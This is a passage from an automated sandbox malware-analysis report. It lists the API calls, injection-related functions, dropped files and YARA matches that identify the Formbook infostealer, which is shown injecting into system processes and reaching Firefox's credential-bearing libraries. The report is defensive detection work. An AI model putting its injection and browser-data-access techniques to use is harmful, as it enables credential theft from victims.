Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_00289862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 7_2_00289862
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_00289DAE NtResumeThread,NtClose, 7_2_00289DAE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F701D4 NtSetValueKey,LdrInitializeThunk, 9_2_01F701D4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F700C4 NtCreateFile,LdrInitializeThunk, 9_2_01F700C4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F70078 NtResumeThread,LdrInitializeThunk, 9_2_01F70078
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F707AC NtCreateMutant,LdrInitializeThunk, 9_2_01F707AC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6F9F0 NtClose,LdrInitializeThunk, 9_2_01F6F9F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6F938 NtWriteFile,LdrInitializeThunk, 9_2_01F6F938
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6F900 NtReadFile,LdrInitializeThunk, 9_2_01F6F900
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_01F6FBB8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_01F6FB68
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FB50 NtCreateKey,LdrInitializeThunk, 9_2_01F6FB50
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_01F6FAE8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_01F6FAD0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FAB8 NtQueryValueKey,LdrInitializeThunk, 9_2_01F6FAB8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FA50 NtEnumerateValueKey,LdrInitializeThunk, 9_2_01F6FA50
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_01F6FDC0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FD8C NtDelayExecution,LdrInitializeThunk, 9_2_01F6FD8C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FC90 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_01F6FC90
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_01F6FC60
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FC48 NtSetInformationFile,LdrInitializeThunk, 9_2_01F6FC48
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FFB4 NtCreateSection,LdrInitializeThunk, 9_2_01F6FFB4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_01F6FED0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FEA0 NtReadVirtualMemory,LdrInitializeThunk, 9_2_01F6FEA0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F71148 NtOpenThread, 9_2_01F71148
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F7010C NtOpenDirectoryObject, 9_2_01F7010C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F710D0 NtOpenProcessToken, 9_2_01F710D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F70060 NtQuerySection, 9_2_01F70060
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F70048 NtProtectVirtualMemory, 9_2_01F70048
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F71930 NtSetContextThread, 9_2_01F71930
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6F8CC NtWaitForSingleObject, 9_2_01F6F8CC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FBE8 NtQueryVirtualMemory, 9_2_01F6FBE8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FA20 NtQueryInformationFile, 9_2_01F6FA20
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F71D80 NtSuspendThread, 9_2_01F71D80
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FD5C NtEnumerateKey, 9_2_01F6FD5C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F70C40 NtGetContextThread, 9_2_01F70C40
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FC30 NtOpenProcess, 9_2_01F6FC30
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FFFC NtCreateProcessEx, 9_2_01F6FFFC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FF34 NtQueueApcThread, 9_2_01F6FF34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F6FE24 NtWriteVirtualMemory, 9_2_01F6FE24
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00099D60 NtCreateFile, 9_2_00099D60
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00099E10 NtReadFile, 9_2_00099E10
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00099E90 NtClose, 9_2_00099E90
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00099F40 NtAllocateVirtualMemory, 9_2_00099F40
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00099E0D NtReadFile, 9_2_00099E0D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00099E8C NtClose, 9_2_00099E8C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00099F3A NtAllocateVirtualMemory, 9_2_00099F3A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DC93CE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 9_2_01DC93CE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DC9862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 9_2_01DC9862
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DC93D2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 9_2_01DC93D2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DC9DAE NtResumeThread,NtClose, 9_2_01DC9DAE
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 10_2_001929C0 NtCreateSection, 10_2_001929C0
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 10_2_00192A10 NtMapViewOfSection, 10_2_00192A10
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 10_2_00192D60 NtCreateFile, 10_2_00192D60
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 10_2_00192E90 NtClose, 10_2_00192E90
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 10_2_00192E8C NtClose, 10_2_00192E8C
Detected potential crypto function
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_1042D054 7_2_1042D054
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10411030 7_2_10411030
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10411174 7_2_10411174
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_1042E912 7_2_1042E912
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_1042D311 7_2_1042D311
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_1042DCAA 7_2_1042DCAA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10412D89 7_2_10412D89
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10412D90 7_2_10412D90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10419E40 7_2_10419E40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10419E3D 7_2_10419E3D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10412FB0 7_2_10412FB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02731238 7_2_02731238
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0268E2E9 7_2_0268E2E9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026DA37B 7_2_026DA37B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02697353 7_2_02697353
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02692305 7_2_02692305
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0268F3CF 7_2_0268F3CF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026B63DB 7_2_026B63DB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_027363BF 7_2_027363BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0270D06D 7_2_0270D06D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02693040 7_2_02693040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026A905A 7_2_026A905A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026BD005 7_2_026BD005
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0268E0C6 7_2_0268E0C6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0271D13F 7_2_0271D13F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02732622 7_2_02732622
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026DA634 7_2_026DA634
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0269E6C1 7_2_0269E6C1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02694680 7_2_02694680
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026C57C3 7_2_026C57C3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0269C7BC 7_2_0269C7BC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0271579A 7_2_0271579A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026CD47D 7_2_026CD47D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0271443E 7_2_0271443E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026A1489 7_2_026A1489
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026C5485 7_2_026C5485
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026D6540 7_2_026D6540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0269351F 7_2_0269351F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_027105E3 7_2_027105E3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026AC5F0 7_2_026AC5F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02743A83 7_2_02743A83
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026B7B00 7_2_026B7B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0271DBDA 7_2_0271DBDA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02716BCB 7_2_02716BCB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0268FBD7 7_2_0268FBD7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0273CBA4 7_2_0273CBA4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026B286D 7_2_026B286D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0269C85C 7_2_0269C85C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0272F8EE 7_2_0272F8EE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0270F8C4 7_2_0270F8C4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02715955 7_2_02715955
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0271394B 7_2_0271394B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026A69FE 7_2_026A69FE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026929B2 7_2_026929B2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0273098E 7_2_0273098E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026AEE4C 7_2_026AEE4C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026C2E2F 7_2_026C2E2F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026BDF7C 7_2_026BDF7C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026A0F3F 7_2_026A0F3F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0271BF14 7_2_0271BF14
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02702FDC 7_2_02702FDC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0272CFB1 7_2_0272CFB1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0271AC5E 7_2_0271AC5E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0269CD5B 7_2_0269CD5B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026C0D3B 7_2_026C0D3B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0272FDDD 7_2_0272FDDD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_00289862 7_2_00289862
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_00281069 7_2_00281069
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_00281072 7_2_00281072
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_00282CEC 7_2_00282CEC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_00282CF2 7_2_00282CF2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_00288132 7_2_00288132
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0028AA32 7_2_0028AA32
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0028DA6F 7_2_0028DA6F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_00285B22 7_2_00285B22
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0028DB0E 7_2_0028DB0E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_00285B1F 7_2_00285B1F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_02021238 9_2_02021238
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F7E0C6 9_2_01F7E0C6
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F9905A 9_2_01F9905A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F83040 9_2_01F83040
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_020263BF 9_2_020263BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FAD005 9_2_01FAD005
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FA63DB 9_2_01FA63DB
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F7F3CF 9_2_01F7F3CF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FCA37B 9_2_01FCA37B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F87353 9_2_01F87353
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F82305 9_2_01F82305
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F7E2E9 9_2_01F7E2E9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F9C5F0 9_2_01F9C5F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_02022622 9_2_02022622
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FC6540 9_2_01FC6540
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F8351F 9_2_01F8351F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F91489 9_2_01F91489
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FB5485 9_2_01FB5485
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FBD47D 9_2_01FBD47D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0200579A 9_2_0200579A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FB57C3 9_2_01FB57C3
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0200443E 9_2_0200443E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F8C7BC 9_2_01F8C7BC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F8E6C1 9_2_01F8E6C1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F84680 9_2_01F84680
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FCA634 9_2_01FCA634
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F969FE 9_2_01F969FE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F829B2 9_2_01F829B2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_02033A83 9_2_02033A83
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FA286D 9_2_01FA286D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F8C85C 9_2_01F8C85C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0202CBA4 9_2_0202CBA4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0200DBDA 9_2_0200DBDA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F7FBD7 9_2_01F7FBD7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0201F8EE 9_2_0201F8EE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FA7B00 9_2_01FA7B00
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0200394B 9_2_0200394B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_02005955 9_2_02005955
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0202098E 9_2_0202098E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F8CD5B 9_2_01F8CD5B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FB0D3B 9_2_01FB0D3B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0201CFB1 9_2_0201CFB1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FF2FDC 9_2_01FF2FDC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FADF7C 9_2_01FADF7C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F90F3F 9_2_01F90F3F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F9EE4C 9_2_01F9EE4C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FB2E2F 9_2_01FB2E2F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0201FDDD 9_2_0201FDDD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0009E912 9_2_0009E912
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0009DCA8 9_2_0009DCA8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00082D89 9_2_00082D89
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00082D90 9_2_00082D90
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00089E3D 9_2_00089E3D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00089E40 9_2_00089E40
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00082FB0 9_2_00082FB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DC9862 9_2_01DC9862
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DC8132 9_2_01DC8132
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DC1072 9_2_01DC1072
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DC1069 9_2_01DC1069
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DC5B1F 9_2_01DC5B1F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DCDB0E 9_2_01DCDB0E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DC5B22 9_2_01DC5B22
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DCDA6F 9_2_01DCDA6F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DCAA32 9_2_01DCAA32
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DC2CF2 9_2_01DC2CF2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DC2CEC 9_2_01DC2CEC
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 10_2_00197912 10_2_00197912
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 10_2_00196CA8 10_2_00196CA8
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 10_2_0017BD90 10_2_0017BD90
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 10_2_0017BD89 10_2_0017BD89
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 10_2_00182E3D 10_2_00182E3D
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 10_2_00182E40 10_2_00182E40
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 10_2_0017BFB0 10_2_0017BFB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 01F7E2A8 appears 38 times
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 01F7DF5C appears 121 times
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 01FC3F92 appears 132 times
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 01FC373B appears 245 times
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 01FEF970 appears 84 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 026D373B appears 248 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 0268E2A8 appears 58 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 026D3F92 appears 132 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 026FF970 appears 84 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 0268DF5C appears 124 times
PE file contains strange resources
Source: Dhdvyxwl[1].exe.2.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Dhdvyxwl[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: name.exe.2.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: name.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Searches the installation path of Mozilla Firefox
Source: C:\Windows\SysWOW64\wlanext.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory Jump to behavior
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: winsqlite3.dll Jump to behavior
Yara signature match
Source: 00000009.00000002.2348540076.0000000000370000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2348540076.0000000000370000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2208647364.00000000001E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2208647364.00000000001E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2208738131.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2208738131.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2348255135.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2348255135.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2246966477.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.2246966477.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2348494474.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2348494474.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
